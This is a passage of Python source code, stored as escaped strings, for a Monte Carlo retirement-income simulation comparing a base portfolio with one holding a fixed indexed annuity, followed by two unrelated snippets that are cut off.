\\\n base_df.loc[counter, 'adv_fees']\n\n base_investment = base_df.loc[counter, 'total_net_fees']\n\n # -------------------Portfolio with PreIncome Values----------------------------\n sim_base_total_preincome.loc[:, 's_{}'.format(str(runs))] = pre_income_base_df.loc[:, 'total_net_fees']\n sim_base_total_preincome.fillna(float(read_income_inputs.loc['risky_assets', 'Base']), inplace=True)\n # --------------------------------PreIncome Block Ends----------------------------\n\n base_df.loc[:, 'adj_total'] = base_df.loc[:, 'total_net_fees'].apply(lambda x: x if x > 0 else 0)\n sim_base_total.loc[:, 's_{}'.format(str(runs))] = base_df.loc[:, 'total_net_fees']\n sim_base_income.loc[:, 's_{}'.format(str(runs))] = base_df.loc[:, 'income']\n sim_base_total_pre_income.loc[:, 's_{}'.format(str(runs))] = base_df.loc[:, 'total_pre_income']\n\n # ----------------------------FIA PORTFOLIO----------------------------------------------\n for name in boy_value:\n fia_portfolio_df.loc[:, name] = 0.0\n pre_income_port_df.loc[:, name] = 0.0\n\n for counter in years:\n period_returns = list(random_returns.loc[counter, :])\n if counter == 0:\n\n fia_portfolio_df.loc[counter, boy_value] = [base_weights[c] * port_investment\n for c in range(len(boy_value))]\n\n # -------------Record the Pre Income Base Portfolio-----------------------------\n\n pre_income_port_df.loc[counter, boy_value] = [base_weights[c] *\n pre_income_port_inv for c in range(len(boy_value))]\n pre_income_port_df.loc[counter, 'total'] = pre_income_port_df.loc[counter, boy_value].sum()\n pre_income_port_inv = pre_income_port_df.loc[counter, boy_value].sum()\n\n # ------------------Pre Income Block Ends------------------------\n\n fia_portfolio_df.loc[counter, 'total'] = fia_portfolio_df.loc[counter, boy_value].sum()\n fia_portfolio_df.loc[counter, 'total_net_fees'] = 0.0\n fia_portfolio_df.loc[counter, 'income'] = 0.0\n # port_investment = fia_portfolio_df.loc[counter, boy_value].sum()\n fia_portfolio_df.loc[counter, 'total_pre_income'] = port_investment\n\n elif (counter > 0) and (counter < income_starts):\n\n fia_portfolio_df.loc[counter, boy_value] = [base_weights[c] * port_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # ------------------Record the Pre Income Base Portfolio-----------------------------\n pre_income_port_df.loc[counter, boy_value] = [\n base_weights[c] * pre_income_port_inv * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # pre_income_port_df.loc[counter, 'total'] = pre_income_port_df.loc[counter, boy_value].sum()\n \n # -----------------------CONSTANT GROWTH RATE-----------------\n pre_income_port_df.loc[counter, 'total'] = port_investment * (1 + const_risky_port_ret)\n\n pre_income_port_df.loc[counter, 'adv_fees'] = pre_income_port_df.loc[counter, 'total'] * adv_fees\n pre_income_port_df.loc[counter, 'total_net_fees'] = pre_income_port_df.loc[counter, 'total'] - \\\n pre_income_port_df.loc[counter, 'adv_fees']\n pre_income_port_inv = pre_income_port_df.loc[counter, 'total_net_fees'] + cpn_income_base\n\n # ------------------Pre Income Block Ends------------------------\n\n # fia_portfolio_df.loc[counter, 'total'] = fia_portfolio_df.loc[counter, boy_value].sum()\n \n # -------CONSTANT GROWTH RATE-----------------\n fia_portfolio_df.loc[counter, 'total'] = port_investment * (1 + const_risky_port_ret)\n\n fia_portfolio_df.loc[counter, 'adv_fees'] = fia_portfolio_df.loc[counter, 'total'] * adv_fees\n fia_portfolio_df.loc[counter, 'total_net_fees'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees']\n fia_portfolio_df.loc[counter, 'total_pre_income'] = fia_portfolio_df.loc[counter, 'total_net_fees']\n\n port_investment = fia_portfolio_df.loc[counter, 'total_net_fees'] + cpn_income_port\n\n else:\n fia_portfolio_df.loc[counter, boy_value] = [base_weights[c] * port_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # -------------Record the Pre Income Base Portfolio-----------------------------\n pre_income_port_df.loc[counter, boy_value] = [\n base_weights[c] * pre_income_port_inv * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # pre_income_port_df.loc[counter, 'total'] = pre_income_port_df.loc[counter, boy_value].sum()\n pre_income_port_df.loc[counter, 'total'] = port_investment * (1 + const_risky_port_ret)\n pre_income_port_df.loc[counter, 'adv_fees'] = pre_income_port_df.loc[counter, 'total'] * adv_fees\n pre_income_port_df.loc[counter, 'total_net_fees'] = pre_income_port_df.loc[counter, 'total'] - \\\n pre_income_port_df.loc[counter, 'adv_fees']\n pre_income_port_inv = pre_income_port_df.loc[counter, 'total_net_fees'] + cpn_income_base\n\n # ------------------Pre Income Block Ends------------------------\n\n # fia_portfolio_df.loc[counter, 'total'] = fia_portfolio_df.loc[counter, boy_value].sum()\n fia_portfolio_df.loc[counter, 'total'] = port_investment * (1 + const_risky_port_ret)\n fia_portfolio_df.loc[counter, 'adv_fees'] = fia_portfolio_df.loc[counter, 'total'] * adv_fees\n\n # ---req. income is adjusted for inflation from the second year of withdrawal. Reinvestment of coupon\n # stops from the year income starts. Req. income is reduced by the coupon payments\n\n if counter == income_starts:\n\n income_needed = req_annual_income - social\n income_net_fia_income = max(0, income_needed - income_from_fia)\n fia_portfolio_df.loc[counter, 'income'] = max(0, income_net_fia_income - cpn_income_port)\n income_needed = req_annual_income\n\n else:\n income_needed = income_needed * (1 + inflation) - social\n income_net_fia_income = max(0, income_needed - income_from_fia)\n fia_portfolio_df.loc[counter, 'income'] = max(0, income_net_fia_income - cpn_income_port)\n income_needed = income_needed + social\n\n fia_portfolio_df.loc[counter, 'total_net_fees'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees'] - \\\n fia_portfolio_df.loc[counter, 'income']\n\n fia_portfolio_df.loc[counter, 'total_pre_income'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees']\n\n port_investment = fia_portfolio_df.loc[counter, 'total_net_fees']\n\n sim_port_total.loc[:, 's_{}'.format(str(runs))] = fia_portfolio_df.loc[:, 'total_net_fees'] + \\\n income_df.loc[:, 'contract_value']\n\n sim_port_income.loc[:, 's_{}'.format(str(runs))] = fia_portfolio_df.loc[:, 'income']\n\n fia_portfolio_df.loc[:, 'adj_total'] = fia_portfolio_df.loc[:, 'total_net_fees'].apply(\n lambda x: x if x > 0 else 0)\n\n sim_port_total_pre_income.loc[:, 's_{}'.format(str(runs))] = fia_portfolio_df.loc[:, 'total_pre_income']\n\n # -------------------Portfolio with PreIncome Values----------------------------\n sim_port_total_preincome.loc[:, 's_{}'.format(str(runs))] = pre_income_port_df.loc[:, 'total_net_fees'] + \\\n income_df.loc[:, 'contract_value']\n\n sim_port_total_preincome.fillna(float(read_income_inputs.loc['risky_assets', 'FIA']), inplace=True)\n \n # --------------------------------PreIncome Block Ends----------------------------\n\n # ------------------Calculate % of portfolios ending value greater than required LIFETIME cumm. income---------\n total_income_by_age = sim_base_income.loc[:, sim_base_income.columns[0]].cumsum()\n total_income_by_acturial_age = total_income_by_age.loc[life_expectancy - clients_age]\n total_income_by_age.fillna(0, inplace=True)\n income_dataframe = pd.DataFrame(total_income_by_age)\n income_dataframe.loc[:, 'remaining_income_by_acturial_age'] = total_income_by_age.apply(\n lambda x: total_income_by_acturial_age - x)\n\n s = income_dataframe.loc[:, 'remaining_income_by_acturial_age']\n base_prob_of_success = sim_base_total.gt(s, axis=0).sum(axis=1)\n port_prob_of_success = sim_port_total.gt(s, axis=0).sum(axis=1)\n\n # ----------------------------Portfolio sufficient for NEXT YEARS income needs-------------------\n next_year_income = sim_base_income.loc[:, sim_base_income.columns[0]].shift(-1).fillna(0) # Yearly Income Reqd.\n base_success_next_year = sim_base_total.gt(next_year_income, axis=0).sum(axis=1)\n\n base_for_next_year_need = sim_base_total[sim_base_total.gt(next_year_income, axis=0)]\n\n port_success_next_year = sim_port_total.gt(next_year_income, axis=0).sum(axis=1)\n\n port_for_next_year_need = sim_port_total[sim_port_total.gt(next_year_income, axis=0)]\n\n # ---------------Portfolio for 45 years of simulation---------------------------------------\n base_success_portfolio = sim_base_total[sim_base_total.gt(next_year_income, axis=0)]\n port_success_portfolio = sim_port_total[sim_port_total.gt(next_year_income, axis=0)]\n\n # ----------------Portfolio Simulation until the acturial age------------------------------\n acturial_years = life_expectancy - clients_age\n base_success_portfolio_act_age = base_success_portfolio.loc[acturial_years, :]\n port_success_portfolio_act_age = port_success_portfolio.loc[acturial_years, :]\n\n # -------------------------Base Portfolio TS with max Terminal Value ----------------------------\n if base_success_portfolio_act_age.isnull().sum() == trials:\n base_max_portfolio = 0.0\n else:\n base_max_portfolio = base_success_portfolio.loc[:, base_success_portfolio_act_age.idxmax()]\n\n # -------------------------FIA Portfolio TS with max Terminal Value ----------------------------\n if port_success_portfolio_act_age.isnull().sum() == trials:\n port_max_portfolio = 0.0\n else:\n port_max_portfolio = port_success_portfolio.loc[:, port_success_portfolio_act_age.idxmax()]\n\n # ------------------------------Average age with full income------------------------------\n base_mean_age = ((life_expectancy - clients_age) - base_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).mean()\n\n port_mean_age = ((life_expectancy - clients_age) - port_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).mean()\n\n # ----------------------------Median Age with full Income------------------------------------------\n base_median_age = ((life_expectancy - clients_age) - base_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).median()\n\n port_median_age = ((life_expectancy - clients_age) - port_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).median()\n\n # --------------Mean Value for all the portfolios at end of the acturial age--------------------\n base_act_avg_porfolio = base_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).mean()\n port_act_avg_porfolio = port_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).mean()\n\n # --------------Median Value for all the portfolios at end of the acturial age--------------------\n base_act_median_porfolio = base_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).median()\n port_act_median_porfolio = port_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).median()\n\n # # --------------Mean Value for all the portfolios in the simulation--------------------\n # base_sim_mean = base_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().mean()\n # port_sim_mean = port_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().mean()\n #\n # # --------------Median Value for all the portfolios in the simulation--------------------\n # base_sim_mean = base_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().median()\n # port_sim_mean = port_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().median()\n\n # -------Max Portfolio value at the end of acturial age----------------------------------------\n base_act_max = base_success_portfolio.loc[life_expectancy - clients_age, :].max()\n port_act_max = port_success_portfolio.loc[life_expectancy - clients_age, :].max()\n\n # -------Min Portfolio value at the end of acturial age----------------------------------------\n base_act_min = base_success_portfolio.loc[life_expectancy - clients_age, :].min()\n port_act_min = port_success_portfolio.loc[life_expectancy - clients_age, :].min()\n\n # ---------------------Lifetime Average Income----------------------------------\n base_total_income = sim_base_income.cumsum().loc[acturial_years, :].mean()\n port_total_income = income_from_fia + sim_port_income\n port_total_income = port_total_income.cumsum().loc[acturial_years, :].mean()\n\n simulation_stats = pd.DataFrame(index=['Average Years', 'Median Years', 'Average Age', 'Median Age',\n 'Average Portfolio (act.age)', 'Median Portfolio (act.age)',\n 'Max Portfolio Value', 'Min Portfolio Value',\n 'Average Lifetime Income'], columns=['Base', 'FIA'])\n\n simulation_stats.loc['Average Years', :] = [base_mean_age, base_mean_age]\n simulation_stats.loc['Median Years', :] = [base_median_age, base_median_age]\n simulation_stats.loc['Average Age', :] = [base_mean_age + clients_age, base_mean_age + clients_age]\n simulation_stats.loc['Median Age', :] = [base_median_age + clients_age, base_median_age + clients_age]\n simulation_stats.loc['Average Portfolio (act.age)', :] = [base_act_avg_porfolio, port_act_avg_porfolio]\n simulation_stats.loc['Median Portfolio (act.age)', :] = [base_act_median_porfolio, port_act_median_porfolio]\n simulation_stats.loc['Max Portfolio Value', :] = [base_act_max, port_act_max]\n simulation_stats.loc['Min Portfolio Value', :] = [base_act_min, port_act_min]\n simulation_stats.loc['Average Lifetime Income', :] = [base_total_income, port_total_income]\n comments = ['Average years of portfolios that meet the next years income needs for the lifetime',\n 'Median years of portfolios that meet the next years income needs for the lifetime',\n 'Average Clients Age',\n 'Median Clients Age',\n 'Average of terminal values for the portfolios at the end of the acturial life',\n 'Median of terminal values for the portfolios at the end of the acturial life',\n 'Maximum of terminal values for the portfolios at the end of the acturial life',\n 'Minimum of terminal values for the portfolios at the end of the acturial life',\n 'Average of total income generated by all portfolios at the end of the acturial life']\n\n simulation_stats.loc[:, 'Notes'] = comments\n\n # --------------------------------------------------------------------------------\n\n # # -----------------------------------income breakdown for Base portfolio----------------------------------\n # base_df.to_csv(src + 'base_port_detail.csv')\n # sim_base_total.to_csv(src + 'base_ending_values.csv')\n # income_breakdown_base = pd.DataFrame(sim_base_total.quantile(0.5, axis=1))\n # income_breakdown_base.loc[:, 'income_from_portfolio'] = sim_base_income.quantile(0.5, axis=1)\n # income_breakdown_base.loc[:, 'fia_income'] = 0.0\n # income_breakdown_base.loc[:, 'social_security_income'] = social\n # income_breakdown_base.loc[:, 'coupon_income'] = cpn_income_base\n #\n # income_breakdown_base.rename(columns={income_breakdown_base.columns[0]: 'portfolio_ending_value'}, inplace=True)\n # income_breakdown_base.loc[:, 'income_from_portfolio'][\n # income_breakdown_base.loc[:, 'portfolio_ending_value'] <= 0] = 0\n # income_breakdown_base.loc[:, 'total_income'] = income_breakdown_base.loc[:, income_breakdown_base.columns[1:]].sum(\n # axis=1)\n #\n # # --------------------------------------Block Ends-----------------------------------------------------------\n #\n # # ---------------------------------------income breakdown for FIA portfolio----------------------------------\n # fia_portfolio_df.to_csv(src + 'fia_port_detail.csv')\n # sim_port_total.to_csv(src + 'fiaport_ending_values.csv')\n #\n # income_breakdown_port = pd.DataFrame(sim_port_total.quantile(0.5, axis=1))\n # income_breakdown_port.loc[:, 'income_from_portfolio'] = sim_port_income.quantile(0.5, axis=1)\n # income_breakdown_port.loc[:, 'fia_income'] = income_from_fia\n # income_breakdown_port.loc[:, 'social_security_income'] = social\n # income_breakdown_port.loc[:, 'coupon_income'] = cpn_income_port\n #\n # income_breakdown_port.rename(columns={income_breakdown_port.columns[0]: 'portfolio_ending_value'}, inplace=True)\n # income_breakdown_port.loc[:, 'income_from_portfolio'][\n # income_breakdown_port.loc[:, 'portfolio_ending_value'] <= 0] = 0\n # income_breakdown_port.loc[:, 'total_income'] = income_breakdown_port.loc[:, income_breakdown_port.columns[1:]].sum(\n # axis=1)\n #\n # # ----------------------------------Block Ends-------------------------------------------------------------\n q_cut = [0.0, 0.1, 0.25, 0.5, 0.75, 0.95, 1.0]\n sim_base_income[sim_base_total < income_needed] = 0.0\n\n sim_port_income[sim_port_total < income_net_fia_income] = 0\n\n sim_port_income = sim_port_income + income_from_fia\n\n # base_quantile = sim_base_total.loc[sim_base_total.index[-1]].quantile([0.05, 0.25, 0.50, 0.75, 0.90])\n #\n # port_quantile = sim_port_total.loc[sim_port_total.index[-1]].quantile([0.05, 0.25, 0.50, 0.75, 0.90])\n\n base_quantile = sim_base_total.loc[sim_base_total.index[-1]].quantile(q_cut)\n\n port_quantile = sim_port_total.loc[sim_port_total.index[-1]].quantile(q_cut)\n\n # q_cut = [0.0, .05, 0.25, 0.5, 0.75, 0.95, 1.0]\n cols = ['Min', '10th', '25th', '50th', '75th', '90th', 'Max']\n\n # ------------------------------------------drop year 0-----------------------------------------\n sim_base_total = sim_base_total[1:]\n sim_port_total = sim_port_total[1:]\n\n # ---------------------------------plot for histogram for porfolios--------------------------------------\n # base_term_value = sim_base_total.loc[sim_base_total.index[:life_expectancy - clients_age], :]\n # fact = 1 / len(base_term_value)\n # base_ann_ret = (base_term_value.iloc[-1] / base_term_value.iloc[0]) ** fact - 1\n # counts, bins, bars = plt.hist(base_ann_ret)\n\n # ------------------------quantile analysis for base terminal value-----------------------------\n base_qcut = pd.DataFrame(index=sim_base_total.index, columns=cols)\n for c in range(len(cols)):\n base_qcut.loc[:, cols[c]] = sim_base_total.quantile(q_cut[c], axis=1)\n\n base_qcut.clip(lower=0, inplace=True)\n\n sim_base_total.clip(lower=0, inplace=True)\n\n # -------------------------------------quantile analysis for base income----------------------------\n base_income_qcut = pd.DataFrame(index=sim_base_income.index, columns=cols)\n for c in range(len(cols)):\n base_income_qcut.loc[:, cols[c]] = sim_base_income.quantile(q_cut[c], axis=1)\n\n # ----Remove NaN's prior to the income start years------------\n # base_income_qcut = base_income_qcut.loc[income_starts:]\n\n # ---------------------------------quantile analysis for portfolio terminal value ---------------\n\n port_qcut = pd.DataFrame(index=sim_port_total.index, columns=cols)\n for c in range(len(cols)):\n port_qcut.loc[:, cols[c]] = sim_port_total.quantile(q_cut[c], axis=1)\n\n port_qcut.clip(lower=0, inplace=True)\n\n # ----------------------------------quantile analysis for portfolio income----------------------------\n port_income_qcut = pd.DataFrame(index=sim_port_income.index, columns=cols)\n for c in range(len(cols)):\n port_income_qcut.loc[:, cols[c]] = sim_port_income.quantile(q_cut[c], axis=1)\n\n # ----Remove NaN's prior to the income start years------------\n # port_income_qcut = port_income_qcut.loc[income_starts:]\n\n # ----------probability ending value will be less than 0 at the end of the horizon -----------------------\n # base_legacy_risk = (sim_base_total.loc[sim_base_total.index[-1]] < 0).sum() / (trials)\n\n base_legacy_risk = (sim_base_total.loc[sim_base_total.index[life_expectancy - clients_age]] < 0).sum() / trials\n port_legacy_risk = (sim_port_total.loc[sim_port_total.index[life_expectancy - clients_age]] < 0).sum() / trials\n\n # port_legacy_risk = (sim_port_total.loc[sim_port_total.index[-1]] <= 0).sum() / (trials)\n\n legacy_risk = pd.DataFrame([base_legacy_risk, port_legacy_risk,\n 'Prob. of portfolio value less than 0 at the end of the expected life'],\n index=['base', 'fia_portfolio', 'Notes'],\n columns=['Ruin Probability'])\n\n # -----------Year-wise probability of ending value greater than 0 -----------------\n base_psuccess = sim_base_total.apply(lambda x: x > 0).sum(axis=1) / trials\n port_psuccess = sim_port_total.apply(lambda x: x > 0).sum(axis=1) / trials\n\n # -----------------------WRITING FILES TO EXCEL ---------------------------\n\n writer = pd.ExcelWriter(dest_simulation + method + '_leveled_growth_simulation.xlsx', engine='xlsxwriter')\n read_income_inputs.to_excel(writer, sheet_name='inputs_for_income')\n\n read_returns_est.to_excel(writer, sheet_name='asset_returns_estimates')\n # read_portfolio_inputs.to_excel(writer, sheet_name='portfolio_inputs')\n\n age_index = list(range(clients_age + 1, clients_age + len(base_qcut) + 1))\n # base_qcut.loc[:, 'clients_age'] = age_index\n # base_qcut.loc[:, 'comment'] = ''\n # base_qcut.loc[:, 'comment'] = np.where(base_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n base_inv = float(read_income_inputs.loc['risky_assets', 'Base'])\n base_qcut.loc[:, 'age'] = age_index\n base_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n\n # -----------------------To start with year 0---------------------------------\n insert_col = [base_inv, base_inv, base_inv, base_inv, base_inv, base_inv,\n base_inv, clients_age, np.nan]\n base_qcut.loc[len(base_qcut) + 1, :] = 0.0\n base_qcut = base_qcut.shift(1)\n base_qcut.iloc[0] = insert_col\n base_qcut.reset_index(drop=True, inplace=True)\n base_qcut.to_excel(writer, sheet_name='base_ending_value_quantiles')\n # base_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='base_ending_value_quantiles')\n\n # base_income_qcut = base_income_qcut[1:] base_income_qcut.loc[:, 'clients_age'] = age_index\n # base_income_qcut.loc[:, 'comment'] = '' base_income_qcut.loc[:, 'comment'] = np.where(\n # base_income_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n base_income_qcut = base_income_qcut.loc[1:, :]\n base_income_qcut.loc[:, 'age'] = age_index\n base_income_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n base_income_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='base_income_quantiles')\n\n # age_index = list(range(clients_age+1, clients_age + len(port_qcut)+1))\n # port_qcut.loc[:, 'clients_age'] = age_index\n # port_qcut.loc[:, 'comment'] = ''\n # port_qcut.loc[:, 'comment'] = np.where(port_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n port_qcut.loc[:, 'age'] = age_index\n port_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n port_qcut.loc[len(port_qcut) + 1, :] = 0.0\n port_qcut = port_qcut.shift(1)\n port_qcut.iloc[0] = insert_col\n port_qcut.reset_index(drop=True, inplace=True)\n port_qcut.to_excel(writer, sheet_name='fia_port_ending_value_quantiles')\n # port_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='fia_port_ending_value_quantiles')\n\n # port_income_qcut = port_income_qcut[1:] port_income_qcut.loc[:, 'clients_age'] = age_index\n # port_income_qcut.loc[:, 'comment'] = '' port_income_qcut.loc[:, 'comment'] = np.where(\n # port_income_qcut.clients_age == life_expectancy, 'expected_life', \"\")\n\n port_income_qcut = port_income_qcut.loc[1:, :]\n port_income_qcut.loc[:, 'age'] = age_index\n port_income_qcut.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n port_income_qcut.loc[income_starts:, :].to_excel(writer, sheet_name='fia_port_income_quantiles')\n\n prob_success_df = pd.concat([base_psuccess, port_psuccess], axis=1)\n prob_success_df.rename(columns={prob_success_df.columns[0]: 'prob(ending_value>0)_base',\n prob_success_df.columns[1]: 'prob(ending_value>0)_port'}, inplace=True)\n\n # prob_success_df.loc[:, 'clients_age'] = age_index\n # prob_success_df.loc[:, 'comment'] = ''\n # prob_success_df.loc[:, 'comment'] = np.where(prob_success_df.clients_age == life_expectancy, 'expected_life', \"\")\n\n prob_success_df.loc[:, 'age'] = age_index\n prob_success_df.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n prob_success_df.loc[:, 'prob(ending_value>lifetime_req income)_base'] = base_prob_of_success / trials\n prob_success_df.loc[:, 'prob(ending_value>lifetime_req income)_port'] = port_prob_of_success / trials\n prob_success_df.loc[:, 'prob(ending_value>next_year_req_income)_base'] = base_success_next_year / trials\n prob_success_df.loc[:, 'prob(ending_value>next_year_req_income)_port'] = port_success_next_year / trials\n prob_success_df.loc[:, 'base_max_portfolio_at_acturial_age'] = base_max_portfolio\n prob_success_df.loc[:, 'port_max_portfolio_at_acturial_age'] = port_max_portfolio\n\n # --------------------Percentile Portfolio's based on Acturial Life------------------------\n base_success = prob_success_df.loc[life_expectancy - clients_age, 'prob(ending_value>next_year_req_income)_base']\n port_success = prob_success_df.loc[life_expectancy - clients_age, 'prob(ending_value>next_year_req_income)_port']\n\n # acturial_age_base_tv = sim_base_total.loc[:life_expectancy - clients_age, ]\n # percentile_base_tv = sim_base_total.apply(lambda x: np.nanpercentile(x, base_success), axis=1)\n\n # ----------------Year wise percentile portfolio to meet next year income. Based on the success at acturial age.\n # Yearly portfolio values that can provide the next year income below the success rate at end of life (Percentile)-\n\n # acturial_age_base = base_for_next_year_need.loc[:life_expectancy - clients_age, ]\n # acturial_age_base = base_for_next_year_need.copy().fillna(0)\n percentile_base = base_for_next_year_need.apply(lambda x: np.nanpercentile(x, base_success), axis=1)\n\n # ----Pre Income Portfolio based on the Probab. of Success to meet next year's income at the end on the Act. Age\n base_pre_income_success = sim_base_total_preincome.apply(lambda x: np.nanpercentile(x, base_success), axis=1)\n base_ann_ret_pre_income = base_pre_income_success.pct_change().fillna(0)\n\n # acturial_age_port_tv = sim_port_total.loc[:life_expectancy - clients_age, ]\n # percentile_port_tv = sim_port_total.apply(lambda x: np.nanpercentile(x, port_success), axis=1)\n\n # ----------------Year wise percentile portfolio to meet next year income. Based on the success at acturial age.\n # Yearly portfolio values that can provide the next year income below the success rate at end of life (Percentile)-\n\n # acturial_age_port = port_for_next_year_need.loc[:life_expectancy - clients_age, ]\n # acturial_age_base = port_for_next_year_need.copy().fillna(0)\n percentile_port = port_for_next_year_need.apply(lambda x: np.nanpercentile(x, port_success), axis=1)\n\n # ----Pre Income Portfolio based on the Probab. of Success to meet next year's income at the end on the Act. Age\n port_pre_income_success = sim_port_total_preincome.apply(lambda x: np.nanpercentile(x, port_success), axis=1)\n port_ann_ret_pre_income = port_pre_income_success.pct_change().fillna(0)\n\n prob_success_df.loc[:, 'acturial_success_percentile_base_portfolio'] = percentile_base\n prob_success_df.loc[:, 'acturial_success_percentile_port_portfolio'] = percentile_port\n\n prob_success_df.loc[:, 'base_pre_income_ann_ret'] = base_ann_ret_pre_income\n prob_success_df.loc[:, 'port_pre_income_ann_ret'] = port_ann_ret_pre_income\n\n # prob_success_df.loc[:, 'terminalVal_success_percentile_base_portfolio'] = percentile_base_tv\n # prob_success_df.loc[:, 'terminalVal_success_percentile_port_portfolio'] = percentile_port_tv\n\n sim_base_total_preincome.to_excel(writer, sheet_name='base_preincome_portfolios')\n # -------Add premium to year 0 value to get total portfolio value---------\n sim_port_total_preincome.iloc[0] = sim_port_total_preincome.iloc[0] + premium\n sim_port_total_preincome.to_excel(writer, sheet_name='port_preincome_portfolios')\n\n # -------------For Simulation slide - BASE Portfolio - Can Delete --------------------\n # base_qcut_preinc = pd.DataFrame(index=sim_base_total_preincome.index, columns=cols)\n # for c in range(len(cols)):\n # base_qcut_preinc.loc[:, cols[c]] = sim_base_total_preincome.quantile(q_cut[c], axis=1)\n #\n # # -------------For Simulation slide - Proposed Portfolio --------------------\n # port_qcut_preinc = pd.DataFrame(index=sim_port_total_preincome.index, columns=cols)\n # for c in range(len(cols)):\n # port_qcut_preinc.loc[:, cols[c]] = sim_port_total_preincome.quantile(q_cut[c], axis=1)\n #\n # base_qcut_preinc.to_excel(writer, sheet_name='base_preincome_quantiles')\n # port_qcut_preinc.to_excel(writer, sheet_name='port_preincome_quantiles')\n\n prob_success_df.to_excel(writer, sheet_name='success_probability')\n\n # --------------BASE - Accumulation and Income Breakdown based on the success percentile portfolio---------------\n base_df.to_csv(src + 'base_port_detail.csv')\n sim_base_total.to_csv(src + 'base_ending_values.csv')\n income_breakdown_base = pd.DataFrame(sim_base_total.quantile(base_success, axis=1))\n income_breakdown_base.loc[:, 'income_from_risky_assets'] = sim_base_income.quantile(base_success, axis=1) \\\n - social - cpn_income_port\n income_breakdown_base.loc[:, 'guaranteed_income'] = 0.0\n income_breakdown_base.loc[:, 'social_security_income'] = social\n income_breakdown_base.loc[:, 'coupon_income'] = cpn_income_base\n\n income_breakdown_base.rename(columns={income_breakdown_base.columns[0]: 'portfolio_ending_value'}, inplace=True)\n income_breakdown_base.loc[:, 'income_from_risky_assets'][\n income_breakdown_base.loc[:, 'portfolio_ending_value'] <= 0] = 0\n income_breakdown_base.loc[:, 'total_income'] = income_breakdown_base.loc[:, income_breakdown_base.columns[1:]].sum(\n axis=1)\n\n # ----------FIA PORTFOLIO - Accumulation and Income Breakdown based on the success percentile portfolio-----------\n fia_portfolio_df.to_csv(src + 'fia_port_detail.csv')\n sim_port_total.to_csv(src + 'fiaport_ending_values.csv')\n\n income_breakdown_port = pd.DataFrame(sim_port_total.quantile(port_success, axis=1))\n income_breakdown_port.loc[:, 'income_from_risky_assets'] = sim_port_income.quantile(port_success, axis=1) \\\n - income_from_fia - social - cpn_income_port\n income_breakdown_port.loc[:, 'guaranteed_income'] = income_from_fia\n income_breakdown_port.loc[:, 'social_security_income'] = social\n income_breakdown_port.loc[:, 'coupon_income'] = cpn_income_port\n\n income_breakdown_port.rename(columns={income_breakdown_port.columns[0]: 'portfolio_ending_value'}, inplace=True)\n income_breakdown_port.loc[:, 'income_from_risky_assets'][\n income_breakdown_port.loc[:, 'portfolio_ending_value'] <= 0] = 0\n income_breakdown_port.loc[:, 'total_income'] = income_breakdown_port.loc[:, income_breakdown_port.columns[1:]].sum(\n axis=1)\n\n # -------------------Write simulation Statistics-------------------------------------\n simulation_stats.to_excel(writer, sheet_name='simulation_statistics')\n\n # port_psuccess.to_excel(writer, sheet_name='fia_port_success_probability')\n\n income_breakdown_base = income_breakdown_base.loc[1:, :]\n income_breakdown_base.loc[:, 'age'] = age_index\n income_breakdown_base.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n income_breakdown_base.loc[income_starts:, :].to_excel(writer, sheet_name='base_income_breakdown_median')\n\n income_breakdown_port = income_breakdown_port.loc[1:, :]\n income_breakdown_port.loc[:, 'age'] = age_index\n income_breakdown_port.loc[life_expectancy - clients_age, 'comment'] = 'expected_life'\n income_breakdown_port.loc[income_starts:, :].to_excel(writer, sheet_name='fia_income_breakdown_median')\n\n legacy_risk.to_excel(writer, sheet_name='ruin_probability')\n\n # if method == 'normal':\n # median_returns_normal.loc[:, 'fia_median_returns'] = median_normal_fia\n # median_returns_normal.to_excel(writer, sheet_name='gr_port_median_normal')\n #\n # elif method == 'smallest':\n # median_returns_smallest.loc[:, 'fia_median_returns'] = median_smallest_fia\n # median_returns_smallest.to_excel(writer, sheet_name='gr_port_median_asc')\n #\n # else:\n # median_returns_largest.loc[:, 'fia_median_returns'] = median_largest_fia\n # median_returns_largest.to_excel(writer, sheet_name='gr_port_median_desc')\n\n # ---------------------Histogram for S&P Forecast---------------------------------------\n sp_returns = read_returns_est.loc['SPXT Index', 'Annualized Returns']\n sp_risk = read_returns_est.loc['SPXT Index', 'Annualized Risk']\n sp_random_ret = np.random.normal(loc=sp_returns, scale=sp_risk, size=10000)\n bins, data = np.histogram(sp_random_ret, bins=20)\n df_ret = pd.DataFrame(data, columns=['Return_range'])\n df_bins = pd.DataFrame(bins, columns=['Count'])\n df_hist = df_ret.join(df_bins)\n\n df_hist.to_excel(writer, sheet_name='sp500_histogram')\n writer.save()\n\n print(\"simulation completed....\")", "def calculate_buy_price(price: float):\n return round(price / (1 + CONF.trade_advantage_in_percent / 100), 1)", "def price_from_vol( self, vol ):\n if self._vol_type == 